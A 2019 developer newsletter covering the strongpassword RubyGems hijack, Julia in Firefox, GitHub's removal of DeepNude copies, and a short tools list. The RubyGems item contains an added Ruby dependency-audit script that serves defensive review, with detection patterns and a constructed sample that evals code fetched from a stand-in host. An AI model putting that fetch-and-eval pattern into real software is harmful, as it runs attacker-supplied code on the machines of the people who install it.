Jul 12, 2019 newsletter

Package hijacking spreads to the Ruby ecosystem as malicious code is inserted into compromised Ruby gem

RubyGems, a package manager for the Ruby programming language, was the latest platform to be targeted by package hijackers. An update to the RubyGems package strongpassword added a few lines of code that would check to see if the gem was running in production and, if so, fetch and run arbitrary code stored in a Pastebin post. The strongpassword package is a fairly popular gem, having been downloaded over 250,000 times in its lifetime. The malicious code was discovered by a developer who notified RubyGems after performing a security audit of his own application’s dependencies. The RubyGems team pulled the package version and locked the associated account. Later analysis revealed that the original developer of the package had his account credentials compromised, giving the hacker unrestricted access.

RubyGems is a package manager that provides a standard format for distributing Ruby libraries (called gems), a tool to install gems, and a service for hosting gems for the community at RubyGems.org. Similar to the npm registry and command line tool, RubyGems allows developers to extend the functionality of their code with a huge ecosystem of open source projects. Unlike RubyGems, however, npm is operated by a for-profit company that offers other services through its package registry.

RubyGems is another victim in a string of similar attacks. Over the past few months, the open source JavaScript community has been under increasing scrutiny after a number of high-profile issues with npm packages. Most recently, a hacker built a trustworthy npm package, only adding malicious code once the package was successfully deployed to an open source project to which the hacker had contributed. Ruby, unfortunately, will need to cope with similar vulnerabilities in its platform.

The pervasiveness and persistence of hijacking attacks show that no developer ecosystem is entirely immune to such attacks. Different package registries, however, are implementing different protective measures on different timelines, meaning developers will likely have to navigate a patchwork of trustworthiness across programming languages.
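The developer who caught the strongpassword update did so by auditing his own dependencies. The script below is an added example, not code from the newsletter, from RubyGems or from the strongpassword gem: it scans installed gem sources for the fetch-and-eval pattern described above (code gated on a production environment that downloads and evaluates remote content). The rule names, the scoring thresholds and the sample snippet are all constructed for illustration; it is a heuristic that narrows what to read by hand, not a malware detector.

```ruby
# Added example: heuristic audit of installed gems for remote fetch-and-eval code.
require "rubygems"

# Rule names and patterns are assumptions chosen for this example.
RULES = {
  env_gate:     /Rails\.env\.production\?|ENV\[["']RAILS_ENV["']\]/,
  remote_fetch: /Net::HTTP\.get|URI\.open|open-uri|OpenURI/,
  dynamic_eval: /\b(eval|instance_eval|class_eval|module_eval)\b/,
  paste_host:   /pastebin\.com/i,
}.freeze

# Scan one source string; returns [[line_number, rule_name, stripped_line], ...]
def suspicious_lines(source)
  source.scrub.each_line.with_index(1).flat_map do |line, no|
    RULES.select { |_, re| line =~ re }.keys.map { |rule| [no, rule, line.strip] }
  end
end

# A remote fetch together with dynamic eval is the high-risk combination.
# An environment check on its own is common and benign, so it only counts as :low.
def risk_level(findings)
  rules = findings.map { |(_, rule, _)| rule }.uniq
  return :high   if (rules & [:remote_fetch, :dynamic_eval]).size == 2
  return :medium if rules.include?(:dynamic_eval) || rules.include?(:paste_host)
  rules.empty? ? :none : :low
end

# Walk every .rb file of every installed gem; returns {gem_name => worst_level}
# for gems that reach :medium or :high, so a reviewer knows where to look first.
def audit_installed_gems
  Gem::Specification.each_with_object({}) do |spec, out|
    Dir.glob(File.join(spec.full_gem_path, "**", "*.rb")).each do |path|
      level = risk_level(suspicious_lines(File.read(path)))
      next unless %i[medium high].include?(level)
      out[spec.name] = level unless out[spec.name] == :high
    end
  end
end

# Constructed sample mimicking the reported behaviour; not the real gem's code.
SAMPLE = <<~RUBY
  module SomeGem
    def self.check
      if Rails.env.production?
        eval(Net::HTTP.get(URI("https://example.invalid/payload")))
      end
    end
  end
RUBY

if __FILE__ == $0
  suspicious_lines(SAMPLE).each { |no, rule, line| puts "#{no}: #{rule} -> #{line}" }
  puts "risk: #{risk_level(suspicious_lines(SAMPLE))}"
end
```

Run `audit_installed_gems` inside the application's bundle (for example via `bundle exec`) so it inspects the gem versions that project actually resolves.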


Mozilla announced that it’s funding a project to bring the Julia programming language to Firefox

The latest recipients of a Mozilla Research Grant are a team of developers and data scientists working to bring a Julia runtime to the web browser. The Julia programming language was created in 2009 by MIT researchers, publicly released in 2012, and has quickly climbed the ranks in popularity. Julia is in the top 50 programming languages according to the Tiobe index and was one of the fastest growing languages in 2018.

Julia was carefully designed to solve big data and analytics problems. Fast like Java and C++, Julia works well as a production-ready language, but also maintains the functionality of popular data science environments like R and Python. Julia joins C, C++, and Fortran as high-level languages that have achieved petaFLOPS computations (that’s at least one quadrillion operations per second).

Mozilla has an impressive history of attempting to port popular data science tools to the browser ecosystem. Earlier this year, as part of a larger effort known as Project Iodide to bring data science tools to the browser, the engineering team at Mozilla created a browser port of the Python interpreter using WebAssembly.

Browsers are rarely regarded as a useful data science tool or environment. Clunky web frameworks, unwieldy JavaScript, and browser limitations make scripting languages and simple IDEs especially attractive for data scientists. But as browsers grow more powerful and solidify their role as the new universal operating system, Mozilla is looking to strengthen its reputation as the most flexible, powerful, and extensible browser available to consumers and developers.


GitHub removes open source versions of DeepNude, a machine learning project that algorithmically removes clothing from images of women

DeepNude, a project that used neural networks to create realistic nude images of women, made headlines in the software development world over the last few weeks due to its controversial usage. DeepNude’s creator pulled the plug on the project, but open source versions of the codebase continued to appear on GitHub, uploaded by other users. GitHub is now removing these repositories in an attempt to stop the spread of tools similar to DeepNude.

Many developers often overlook the fact that GitHub, as the de facto home of open source software, still retains the right to moderate content that does not abide by its acceptable use policies. GitHub states “we do not proactively monitor user-generated content, but we do actively investigate abuse reports.” As Facebook, Twitter, and other technology giants come under fire for their handling of offensive and controversial content, growing scrutiny will likely make its way slowly into the developer world, particularly as open source software on public platforms continues to rapidly expand. GitHub may soon have to contend with the fact that controversial content and open source software could overlap more frequently in the future.


Small bytes


Tools

  • GIT.WTF is a curated list of tricky situations that you might find yourself in when using git with simple ways to get out peacefully [GIT.WTF]
  • p5.js is a client-side JS platform that empowers artists, designers, students, and anyone to learn to code and express themselves creatively on the web [P5.JS]
  • Frappe charts are GitHub-inspired simple and modern SVG charts for the web with zero dependencies [FRAPPE]
  • Notable is an open-source Markdown-based note-taking app that doesn’t suck [NOTABLE]
  • Awesome-indie is a repository of resources for independent developers to make money [GITHUB]